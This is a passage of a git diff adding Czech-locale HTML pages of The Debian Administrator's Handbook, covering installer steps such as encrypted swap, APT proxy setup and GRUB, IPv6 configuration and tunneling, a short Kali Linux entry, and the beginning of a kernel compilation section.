+					When an encrypted partition is used, the encryption key is stored in memory (RAM). Since retrieving this key allows the decryption of the data, it is of utmost importance to avoid leaving a copy of this key that would be accessible to the possible thief of the computer or hard drive, or to a maintenance technician. This is however something that can easily occur with a laptop, since when hibernating the contents of RAM is stored on the swap partition. If this partition isn't encrypted, the thief may access the key and use it to decrypt the data from the encrypted partitions. This is why, when you use encrypted partitions, it is imperative to also encrypt the swap partition!
+				</div><div
+                class="para">
+					The Debian installer will warn the user if they try to make an encrypted partition while the swap partition isn't encrypted.
+				</div></div><div
+              class="para">
+					To create an encrypted partition, you must first assign an available partition for this purpose. To do so, select a partition and indicate that it is to be used as a “physical volume for encryption”. After partitioning the disk containing the physical volume to be made, choose “Configure encrypted volumes”. The software will then propose to initialize the physical volume with random data (making the localization of the real data more difficult), and will ask you to enter an “encryption passphrase”, which you will have to enter every time you boot your computer in order to access the content of the encrypted partition. Once this step has been completed, and you have returned to the partitioning tool menu, a new partition will be available in an “encrypted volume”, which you can then configure just like any other partition. In most cases, this partition is used as a physical volume for LVM so as to protect several partitions (LVM logical volumes) with the same encryption key, including the swap partition (see sidebar <a
+                class="xref"
+                href="sect.installation-steps.html#sidebar.encrypted-swap-partition"><span
+                  class="emphasis"><em>SECURITY</em></span> Encrypted swap partition</a>).
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.15"></a>4.2.14. Installing the Base System</h3></div></div></div><a
+            id="id-1.7.12.15.2"
+            class="indexterm"></a><div
+            class="para">
+				This step, which doesn't require any user interaction, installs the Debian “base system” packages. This includes the <code
+              class="command">dpkg</code> and <code
+              class="command">apt</code> tools, which manage Debian packages, as well as the utilities necessary to boot the system and start using it.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.15.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-basesystem.png"
+                  alt="Installation of the base system" /></div></div><p
+              class="title"><strong>Obrázek 4.11. Installation of the base system</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.16"></a>4.2.15. Configuring the Package Manager (<code
+                    class="command">apt</code>)</h3></div></div></div><a
+            id="id-1.7.12.16.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.16.3"
+            class="indexterm"></a><div
+            class="para">
+				In order to be able to install additional software, APT needs to be configured and told where to find Debian packages. This step is as automated as possible. It starts with a question asking if it must use a network source for packages, or if it should only look for packages on the CD-ROM.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Debian CD-ROM in the drive</strong></p></div></div></div><div
+              class="para">
+				If the installer detects a Debian installation disk in the CD/DVD reader, it is not necessary to configure APT to go looking for packages on the network: APT is automatically configured to read packages from a removable media drive. If the disk is part of a set, the software will offer to “explore” other disks in order to reference all of the packages stored on them.
+			</div></div><div
+            class="para">
+				If getting packages from the network is requested, the next two questions allow to choose a server from which to download these packages, by choosing first a country, then a mirror available in that country (a mirror is a public server hosting copies of all the files of the Debian master archive).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.16.7"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-mirror.png"
+                  alt="Selecting a Debian mirror" /></div></div><p
+              class="title"><strong>Obrázek 4.12. Selecting a Debian mirror</strong></p></div><div
+            class="para">
+				Finally, the program proposes to use an HTTP proxy. If there is no proxy, Internet access will be direct. If you type <code
+              class="literal">http://proxy.falcot.com:3128</code>, APT will use the Falcot <span
+              class="foreignphrase"><em
+                class="foreignphrase">proxy/cache</em></span>, a “Squid” program. You can find these settings by checking the configurations of a web browser on another machine connected to the same network.
+			</div><div
+            class="para">
+				The files <code
+              class="filename">Packages.xz</code> and <code
+              class="filename">Sources.xz</code> are then automatically downloaded to update the list of packages recognized by APT.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> HTTP proxy</strong></p></div></div></div><a
+              id="id-1.7.12.16.10.2"
+              class="indexterm"></a><a
+              id="id-1.7.12.16.10.3"
+              class="indexterm"></a><a
+              id="id-1.7.12.16.10.4"
+              class="indexterm"></a><a
+              id="id-1.7.12.16.10.5"
+              class="indexterm"></a><div
+              class="para">
+				An HTTP proxy is a server that forwards an HTTP request for network users. It sometimes helps to speed up downloads by keeping a copy of files that have been transferred through it (we then speak of proxy/cache). In some cases, it is the only means of accessing an external web server; in such cases it is essential to answer the corresponding question during installation for the program to be able to download the Debian packages through it.
+			</div><div
+              class="para">
+				Squid is the name of the server software used by Falcot Corp to offer this service.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.17"></a>4.2.16. Debian Package Popularity Contest</h3></div></div></div><div
+            class="para">
+				The Debian system contains a package called <span
+              class="pkg pkg">popularity-contest</span>, whose purpose is to compile package usage statistics. Each week, this program collects information on the packages installed and those used recently, and anonymously sends this information to the Debian project servers. The project can then use this information to determine the relative importance of each package, which influences the priority that will be granted to them. In particular, the most “popular” packages will be included in the installation CD-ROM, which will facilitate their access for users who do not wish to download them or to purchase a complete set.
+			</div><div
+            class="para">
+				This package is only activated on demand, out of respect for the confidentiality of users' usage.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.18"></a>4.2.17. Selecting Packages for Installation</h3></div></div></div><div
+            class="para">
+				The following step allows you to choose the purpose of the machine in very broad terms; the ten suggested tasks correspond to lists of packages to be installed. The list of the packages that will actually be installed will be fine-tuned and completed later on, but this provides a good starting point in a simple manner.
+			</div><div
+            class="para">
+				Some packages are also automatically installed according to the hardware detected (thanks to the program <code
+              class="command">discover-pkginstall</code> from the <span
+              class="pkg pkg">discover</span> package).
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.7.12.18.4"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/inst-tasksel.png"
+                  alt="Task choices" /></div></div><p
+              class="title"><strong>Obrázek 4.13. Task choices</strong></p></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.installing-grub"></a>4.2.18. Installing the GRUB Bootloader</h3></div></div></div><a
+            id="id-1.7.12.19.2"
+            class="indexterm"></a><a
+            id="id-1.7.12.19.3"
+            class="indexterm"></a><a
+            id="id-1.7.12.19.4"
+            class="indexterm"></a><div
+            class="para">
+				The bootloader is the first program started by the BIOS. This program loads the Linux kernel into memory and then executes it. It often offers a menu that allows the user to choose the kernel to load and/or the operating system to boot.
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.bootloader-dual-boot"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BEWARE</em></span> Bootloader and dual boot</strong></p></div></div></div><a
+              id="id-1.7.12.19.6.2"
+              class="indexterm"></a><div
+              class="para">
+				This phase in the Debian installation process detects the operating systems that are already installed on the computer, and automatically adds corresponding entries in the boot menu, but not all installation programs do this.
+			</div><div
+              class="para">
+				In particular, if you install (or reinstall) Windows thereafter, the bootloader will be erased. Debian will still be on the hard drive, but will no longer be accessible from the boot menu. You would then have to boot the Debian installation system in <strong
+                class="userinput"><code>rescue</code></strong> mode to set up a less exclusive bootloader. This operation is described in detail in the installation manual. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch08s07.html">http://www.debian.org/releases/stable/amd64/ch08s07.html</a></div>
+			</div></div><div
+            class="para">
+				By default, the menu proposed by GRUB contains all the installed Linux kernels, as well as any other operating systems that were detected. This is why you should accept the offer to install it in the Master Boot Record. Since keeping older kernel versions preserves the ability to boot the same system if the most recently installed kernel is defective or poorly adapted to the hardware, it often makes sense to keep a few older kernel versions installed.
+			</div><div
+            class="para">
+				GRUB is the default bootloader installed by Debian thanks to its technical superiority: it works with most filesystems and therefore doesn't require an update after each installation of a new kernel, since it reads its configuration during boot and finds the exact position of the new kernel. Version 1 of GRUB (now known as “Grub Legacy”) couldn't handle all combinations of LVM and software RAID; version 2, installed by default, is more complete. There may still be situations where it is more recommendable to install LILO (another bootloader); the installer will suggest it automatically.
+			</div><div
+            class="para">
+				For more information on configuring GRUB, please refer to <a
+              class="xref"
+              href="sect.config-bootloader.html#sect.config-grub">8.8.3 – „GRUB 2 Configuration“</a>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BEWARE</em></span> Bootloaders and architectures</strong></p></div></div></div><div
+              class="para">
+				LILO and GRUB, which are mentioned in this chapter, are bootloaders for <span
+                class="emphasis"><em>i386</em></span> and <span
+                class="emphasis"><em>amd64</em></span> architectures. If you install Debian on another architecture, you will need to use another bootloader. Among others, we can cite <code
+                class="command">yaboot</code> or <code
+                class="command">quik</code> for <span
+                class="emphasis"><em>powerpc</em></span>, <code
+                class="command">silo</code> for <span
+                class="emphasis"><em>sparc</em></span>, <code
+                class="command">aboot</code> for <span
+                class="emphasis"><em>alpha</em></span>, <code
+                class="command">arcboot</code> for <span
+                class="emphasis"><em>mips</em></span>.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.12.20"></a>4.2.19. Finishing the Installation and Rebooting</h3></div></div></div><div
+            class="para">
+				The installation is now complete, the program invites you to remove the CD-ROM from the reader and to restart the computer.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="installation.html"><strong>Předcházející</strong>Kapitola 4. Installation</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.after-first-boot.html"><strong>Další</strong>4.3. After the First Boot</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.ipv6.html b/tmp/cs-CZ/html/sect.ipv6.html
new file mode 100644
index 000000000..c5351ea89
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.ipv6.html
@@ -0,0 +1,221 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">10.5. IPv6</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-infrastructure.html"
+        title="Kapitola 10. Network Infrastructure" /><link
+        rel="prev"
+        href="sect.dynamic-routing.html"
+        title="10.4. Dynamic Routing" /><link
+        rel="next"
+        href="sect.domain-name-servers.html"
+        title="10.6. Domain Name Servers (DNS)" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ipv6.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dynamic-routing.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.domain-name-servers.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ipv6"></a>10.5. IPv6</h2></div></div></div><div
+          class="para">
+			IPv6, successor to IPv4, is a new version of the IP protocol designed to fix its flaws, most notably the scarcity of available IP addresses. This protocol handles the network layer; its purpose is to provide a way to address machines, to convey data to their intended destination, and to handle data fragmentation if needed (in other words, to split packets into chunks with a size that depends on the network links to be used on the path and to reassemble the chunks in their proper order on arrival).
+		</div><div
+          class="para">
+			Debian kernels include IPv6 handling in the core kernel (with the exception of some architectures that have it compiled as a module named <code
+            class="literal">ipv6</code>). Basic tools such as <code
+            class="command">ping</code> and <code
+            class="command">traceroute</code> have their IPv6 equivalents in <code
+            class="command">ping6</code> and <code
+            class="command">traceroute6</code>, available respectively in the <span
+            class="pkg pkg">iputils-ping</span> and <span
+            class="pkg pkg">iputils-tracepath</span> packages.
+		</div><a
+          id="id-1.13.8.4"
+          class="indexterm"></a><a
+          id="id-1.13.8.5"
+          class="indexterm"></a><a
+          id="id-1.13.8.6"
+          class="indexterm"></a><div
+          class="para">
+			The IPv6 network is configured similarly to IPv4, in <code
+            class="filename">/etc/network/interfaces</code>. But if you want that network to be globally available, you must ensure that you have an IPv6-capable router relaying traffic to the global IPv6 network.
+		</div><div
+          class="example"><a
+            xmlns=""
+            id="example.network-interfaces-ipv6"></a><p
+            class="title"><strong>Příklad 10.10. Example of IPv6 configuration</strong></p><div
+            class="example-contents"><pre
+              class="programlisting">
+iface eth0 inet6 static
+    address 2001:db8:1234:5::1:1
+    netmask 64
+    # Disabling auto-configuration
+    # autoconf 0
+    # The router is auto-configured and has no fixed address
+    # (accept_ra 1). If it had:
+    # gateway 2001:db8:1234:5::1
+</pre></div></div><div
+          class="para">
+			IPv6 subnets usually have a netmask of 64 bits. This means that 2<sup>64</sup> distinct addresses exist within the subnet. This allows Stateless Address Autoconfiguration (<acronym
+            class="acronym">SLAAC</acronym>) to pick an address based on the network interface's MAC address. By default, if <acronym
+            class="acronym">SLAAC</acronym> is activated in your network and IPv6 on your computer, the kernel will automatically find IPv6 routers and configure the network interfaces.
+		</div><div
+          class="para">
+			This behavior may have privacy implications. If you switch networks frequently, e.g. with a laptop, you might not want your <acronym
+            class="acronym">MAC</acronym> address being a part of your public IPv6 address. This makes it easy to identify the same device across networks. A solution to this are IPv6 privacy extensions (which Debian enables by default if IPv6 connectivity is detected during initial installation), which will assign an additional randomly generated address to the interface, periodically change them and prefer them for outgoing connections. Incoming connections can still use the address generated by SLAAC. The following example, for use in <code
+            class="filename">/etc/network/interfaces</code>, activates these privacy extensions.
+		</div><div
+          class="example"><a
+            xmlns=""
+            id="example.network-interface-ipv6-privext"></a><p
+            class="title"><strong>Příklad 10.11. IPv6 privacy extensions</strong></p><div
+            class="example-contents"><pre
+              class="programlisting">
+iface eth0 inet6 auto
+    # Prefer the randomly assigned addresses for outgoing connections.
+    privext 2
+</pre></div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Programs built with IPv6</strong></p></div></div></div><div
+            class="para">
+			Many pieces of software need to be adapted to handle IPv6. Most of the packages in Debian have been adapted already, but not all. If your favorite package does not work with IPv6 yet, you can ask for help on the <span
+              class="emphasis"><em>debian-ipv6</em></span> mailing-list. They might know about an IPv6-aware replacement and could file a bug to get the issue properly tracked. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://lists.debian.org/debian-ipv6/">http://lists.debian.org/debian-ipv6/</a></div>
+		</div></div><a
+          id="id-1.13.8.13"
+          class="indexterm"></a><a
+          id="id-1.13.8.14"
+          class="indexterm"></a><a
+          id="id-1.13.8.15"
+          class="indexterm"></a><div
+          class="para">
+			IPv6 connections can be restricted, in the same fashion as for IPv4: the standard Debian kernels include an adaptation of <span
+            class="emphasis"><em>netfilter</em></span> for IPv6. This IPv6-enabled <span
+            class="emphasis"><em>netfilter</em></span> is configured in a similar fashion to its IPv4 counterpart, except the program to use is <code
+            class="command">ip6tables</code> instead of <code
+            class="command">iptables</code>.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ipv6-tunneling"></a>10.5.1. Tunneling</h3></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> IPv6 tunneling and firewalls</strong></p></div></div></div><div
+              class="para">
+				IPv6 tunneling over IPv4 (as opposed to native IPv6) requires the firewall to accept the traffic, which uses IPv4 protocol number 41.
+			</div></div><div
+            class="para">
+				If a native IPv6 connection is not available, the fallback method is to use a tunnel over IPv4. Gogo6 is one (free) provider of such tunnels: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.gogo6.com/freenet6/tunnelbroker">http://www.gogo6.com/freenet6/tunnelbroker</a></div>
+			</div><a
+            id="id-1.13.8.17.4"
+            class="indexterm"></a><a
+            id="id-1.13.8.17.5"
+            class="indexterm"></a><div
+            class="para">
+				To use a Freenet6 tunnel, you need to register for a Freenet6 Pro account on the website, then install the <span
+              class="pkg pkg">gogoc</span> package and configure the tunnel. This requires editing the <code
+              class="filename">/etc/gogoc/gogoc.conf</code> file: <code
+              class="literal">userid</code> and <code
+              class="literal">password</code> lines received by e-mail should be added, and <code
+              class="literal">server</code> should be replaced with <code
+              class="literal">authenticated.freenet6.net</code>.
+			</div><div
+            class="para">
+				IPv6 connectivity is proposed to all machines on a local network by adding the three following directives to the <code
+              class="filename">/etc/gogoc/gogoc.conf</code> file (assuming the local network is connected to the eth0 interface):
+			</div><pre
+            class="programlisting">
+host_type=router
+prefixlen=56
+if_prefix=eth0
+</pre><div
+            class="para">
+				The machine then becomes the access router for a subnet with a 56-bit prefix. Once the tunnel is aware of this change, the local network must be told about it; this implies installing the <code
+              class="command">radvd</code> daemon (from the similarly-named package). This IPv6 configuration daemon has a role similar to <code
+              class="command">dhcpd</code> in the IPv4 world.
+			</div><div
+            class="para">
+				The <code
+              class="filename">/etc/radvd.conf</code> configuration file must then be created (see <code
+              class="filename">/usr/share/doc/radvd/examples/simple-radvd.conf</code> as a starting point). In our case, the only required change is the prefix, which needs to be replaced with the one provided by Freenet6; it can be found in the output of the <code
+              class="command">ifconfig</code> command, in the block concerning the <code
+              class="literal">tun</code> interface.
+			</div><a
+            id="id-1.13.8.17.11"
+            class="indexterm"></a><div
+            class="para">
+				Then run <code
+              class="command">service gogoc restart</code> and <code
+              class="command">service radvd start</code>, and the IPv6 network should work.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dynamic-routing.html"><strong>Předcházející</strong>10.4. Dynamic Routing</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.domain-name-servers.html"><strong>Další</strong>10.6. Domain Name Servers (DNS)</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.kali.html b/tmp/cs-CZ/html/sect.kali.html
new file mode 100644
index 000000000..b09a802cb
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.kali.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.8. Kali Linux</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.tails.html"
+        title="A.7. Tails" /><link
+        rel="next"
+        href="sect.devuan.html"
+        title="A.9. Devuan" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kali.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tails.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.devuan.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kali"></a>A.8. Kali Linux</h2></div></div></div><a
+          id="id-1.20.11.2"
+          class="indexterm"></a><a
+          id="id-1.20.11.3"
+          class="indexterm"></a><a
+          id="id-1.20.11.4"
+          class="indexterm"></a><div
+          class="para">
+			Kali Linux is a Debian-based distribution specialising in penetration testing (“pentesting” for short). It provides software that helps auditing the security of an existing network or computer while it is live, and analyze it after an attack (which is known as “computer forensics”). <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://kali.org">https://kali.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tails.html"><strong>Předcházející</strong>A.7. Tails</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.devuan.html"><strong>Další</strong>A.9. Devuan</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.kernel-compilation.html b/tmp/cs-CZ/html/sect.kernel-compilation.html
new file mode 100644
index 000000000..0267e8a2c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.kernel-compilation.html
@@ -0,0 +1,425 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.10. Compiling a Kernel</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.config-misc.html"
+        title="8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…" /><link
+        rel="next"
+        href="sect.kernel-installation.html"
+        title="8.11. Installing a Kernel" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kernel-compilation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-misc.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-installation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kernel-compilation"></a>8.10. Compiling a Kernel</h2></div></div></div><a
+          id="id-1.11.14.2"
+          class="indexterm"></a><a
+          id="id-1.11.14.3"
+          class="indexterm"></a><div
+          class="para">
+			The kernels provided by Debian include the largest possible number of features, as well as the maximum of drivers, in order to cover the broadest spectrum of existing hardware configurations. This is why some users prefer to recompile the kernel in order to only include what they specifically need. There are two reasons for this choice. First, it may be to optimize memory consumption, since the kernel code, even if it is never used, occupies memory for nothing (and never “goes down” on the swap space, since it is actual RAM that it uses), which can decrease overall system performance. A locally compiled kernel can also limit the risk of security problems since only a fraction of the kernel code is compiled and run.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> Security updates</strong></p></div></div></div><div
+            class="para">
+			If you choose to compile your own kernel, you must accept the consequences: Debian cannot ensure security updates for your custom kernel. By keeping the kernel provided by Debian, you benefit from updates prepared by the Debian Project's security team.
+		</div></div><div
+          class="para">
+			Recompilation of the kernel is also necessary if you want to use certain features that are only available as patches (and not included in the standard kernel version).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> The Debian Kernel Handbook</strong></p></div></div></div><a
+            id="id-1.11.14.7.2"
+            class="indexterm"></a><div
+            class="para">
+			The Debian kernel teams maintains the “Debian Kernel Handbook” (also available in the <span
+              class="pkg pkg">debian-kernel-handbook</span> package) with comprehensive documentation about most kernel related tasks and about how official Debian kernel packages are handled. This is the first place you should look into if you need more information than what is provided in this section. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://kernel-team.pages.debian.net/kernel-handbook/">https://kernel-team.pages.debian.net/kernel-handbook/</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-compilation-prerequisites"></a>8.10.1. Introduction and Prerequisites</h3></div></div></div><div
+            class="para">
+				Unsurprisingly Debian manages the kernel in the form of a package, which is not how kernels have traditionally been compiled and installed. Since the kernel remains under the control of the packaging system, it can then be removed cleanly, or deployed on several machines. Furthermore, the scripts associated with these packages automate the interaction with the bootloader and the initrd generator.
+			</div><div
+            class="para">
+				The upstream Linux sources contain everything needed to build a Debian package of the kernel. But you still need to install <span
+              class="pkg pkg">build-essential</span> to ensure that you have the tools required to build a Debian package. Furthermore, the configuration step for the kernel requires the <span
+              class="pkg pkg">libncurses5-dev</span> package. Finally, the <span
+              class="pkg pkg">fakeroot</span> package will enable creation of the Debian package without using administrator's rights.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> The good old days of <span
+                        class="pkg pkg">kernel-package</span></strong></p></div></div></div><a
+              id="id-1.11.14.8.4.2"
+              class="indexterm"></a><div
+              class="para">
+				Before the Linux build system gained the ability to build proper Debian packages, the recommended way to build such packages was to use <code
+                class="command">make-kpkg</code> from the <span
+                class="pkg pkg">kernel-package</span> package.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-sources"></a>8.10.2. Getting the Sources</h3></div></div></div><a
+            id="id-1.11.14.9.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.9.3"
+            class="indexterm"></a><a
+            id="id-1.11.14.9.4"
+            class="indexterm"></a><div
+            class="para">
+				Like anything that can be useful on a Debian system, the Linux kernel sources are available in a package. To retrieve them, just install the <span
+              class="pkg pkg">linux-source-<em
+                class="replaceable">version</em></span> package. The <code
+              class="command">apt search ^linux-source</code> command lists the various kernel versions packaged by Debian. The latest version is available in the <span
+              class="distribution distribution">Unstable</span> distribution: you can retrieve them without much risk (especially if your APT is configured according to the instructions of <a
